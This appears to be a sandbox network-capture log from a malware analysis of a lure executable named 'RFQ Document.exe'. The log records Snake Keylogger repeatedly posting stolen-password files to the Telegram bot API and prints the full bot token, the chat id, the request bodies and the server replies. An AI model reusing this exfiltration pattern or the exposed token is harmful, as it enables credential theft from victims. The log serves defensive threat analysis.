                                            Data Ascii: --------------------------8d98255dcc2c405Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:06 UTC251INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:06 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:06 UTC252INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12745,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808746,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            158192.168.2.449970149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:06 UTC252OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dcf010c9
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:06 UTC253OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 63 66 30 31 30 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dcf010c9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:06 UTC253INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:06 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:06 UTC253INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12746,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808746,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            159192.168.2.449972149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:06 UTC254OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dd0f0f14
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:06 UTC254OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 64 30 66 30 66 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dd0f0f14Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:06 UTC255INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:06 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:06 UTC255INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12747,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808746,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            16192.168.2.449790149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:23 UTC25OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c3ba1acd
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:23 UTC25OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 62 61 31 61 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c3ba1acdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:23 UTC26INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:23 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:23 UTC26INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12595,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808703,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            160192.168.2.449974149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:06 UTC255OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dd2bac15
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:06 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 64 32 62 61 63 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dd2bac15Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:06 UTC256INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:06 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:06 UTC257INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12748,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808746,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            161192.168.2.449975149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:07 UTC257OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ddbd1b4c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:07 UTC257OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 64 62 64 31 62 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ddbd1b4cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:07 UTC258INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:07 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:07 UTC258INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12749,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808747,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            162192.168.2.449977149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:07 UTC259OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dde3413e
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:07 UTC259OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 64 65 33 34 31 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dde3413eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:07 UTC259INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:07 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:07 UTC260INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12751,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808747,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            163192.168.2.449978149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:08 UTC260OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255de096688
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:08 UTC261OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 30 39 36 36 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255de096688Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:08 UTC261INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:08 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
